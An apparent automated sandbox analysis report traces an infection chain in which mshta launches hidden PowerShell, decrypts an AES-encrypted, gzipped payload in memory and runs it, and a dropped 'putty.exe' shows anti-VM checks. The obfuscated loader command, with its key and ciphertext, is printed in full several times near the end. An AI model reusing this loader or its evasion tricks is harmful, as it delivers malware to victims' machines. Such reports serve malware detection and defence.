Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 668Thread sleep count: 2570 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292Thread sleep count: 134 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep count: 4643 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep count: 4001 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1296Thread sleep time: -21213755684765971s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5372Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\putty.exeCode function: 10_2_0044A49B GetLocalTime followed by cmp: cmp word ptr [ebp-10h], ax and CTI: jc 0044A4E5h10_2_0044A49B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1888Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1360Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2570Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4643Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4001Jump to behavior
Source: C:\Users\user\putty.exeAPI coverage: 5.8 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\putty.exeCode function: 10_2_0045114E VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,10_2_0045114E
Source: C:\Users\user\putty.exeCode function: 10_2_004486F8 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindClose,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004486F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000000.00000002.1425618883.0000000002D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: putty.exe, 0000000A.00000002.2599940040.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: mshta.exe, 00000000.00000002.1425618883.0000000002D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Users\user\putty.exeCode function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004451A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell - }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr | powershell -
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fnapop = 'aaaaaaaaaaaaaaaaaaaaapq3+yyuesdcp30fctt1g8+bllqdeek2rl0/q2v+83d4bffpss5iju6kfes1jzaaiijofb3qbz4arua/p0a2xkjm5iunw72eqrkskcntemtjharvolhxtff2y5wz5p2jtj8qoabdnbfsmoktklgidkmitv4lcg8milukzud9s+wkjzqzjtcjo/2g5kr/8oacycs/ngtky8eujifd3jjz5ylyw3ofjpf3mj9czn20cb8phyfovw8cht0xnvzcfmgo/e8zd5zqzfwg7smpcda2exuzdgajgu5thhwb7zeht3d3pib67d6q7vhjnkgbsiv6zcpofip7s25z6l2wgczc+2l0h4wg5atfmshceyxblkjml3+4vdt9rw3zep3gp2c/hy8udbeid77xxgk3+qrdnhalxw7kxafq6b8jyiffp3403hxtqvgreahvvf8yj2rvmsbdjplrnscmvgd9iqa7oxvubnuww9u2m23jisesq4uz7nhkfbozi8yuxfairoongw7ty7xud6uprxjtiawnnns2saqk/okx7moms6bgvr3yyh/sg2sq5kq7ryejpk4btikllkdmilzqnu8d/xf1cezaopnm27zbagy2uyzvlziepnimut6tkfecr+kqcrmydbfcsk/3rbypdzneodmrrjzuejpskcyj60ix9evqybktmtpkyyt4ygrr/6uu6i+3tyllqxzjjhnngbzyxvxwmnys9nzndpphf2bmyelnennqsng8rs0j4jtd9ozojo6orwxfy54hd1omi8rzby565/grqubrf9knj3pkkkx5lo7jjjkda49arw/ygaivigrgvzkfqolkwinuh3agyb/7frzuykelczmwxhr7gpjmxmpop3scshlt6p522cvjaclhmbxh8ebvj89klig5dng0o1y0kv3zj8qkxzcmfiht+wa0p7c89p9ihf41cm6qus0cjzqxjh76oprm8iujlcd9smmxukre8soplrje+s8rbdtv';$mehlazdc = 'd2z5wfdpd1vksxdqyxncrnhtrwrusfbtzgjqwlftsxo=';$pylehht = new-object 'system.security.cryptography.aesmanaged';$pylehht.mode = [system.security.cryptography.ciphermode]::ecb;$pylehht.padding = [system.security.cryptography.paddingmode]::zeros;$pylehht.blocksize = 128;$pylehht.keysize = 256;$pylehht.key = [system.convert]::frombase64string($mehlazdc);$bwops = [system.convert]::frombase64string($fnapop);$mkdtxwxs = $bwops[0..15];$pylehht.iv = $mkdtxwxs;$ialmfbndk = $pylehht.createdecryptor();$mvuygvuhe = $ialmfbndk.transformfinalblock($bwops, 16, $bwops.length - 16);$pylehht.dispose();$cxvqsolz = new-object system.io.memorystream( , $mvuygvuhe );$kpnxbbu = new-object system.io.memorystream;$ugbpshizt = new-object system.io.compression.gzipstream $cxvqsolz, ([io.compression.compressionmode]::decompress);$ugbpshizt.copyto( $kpnxbbu );$ugbpshizt.close();$cxvqsolz.close();[byte[]] $bsmmu = $kpnxbbu.toarray();$fpimsbr = [system.text.encoding]::utf8.getstring($bsmmu);$fpimsbr
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted start-process 'cmd.exe' -windowstyle hidden -argumentlist {/c powershell.exe $fnapop = 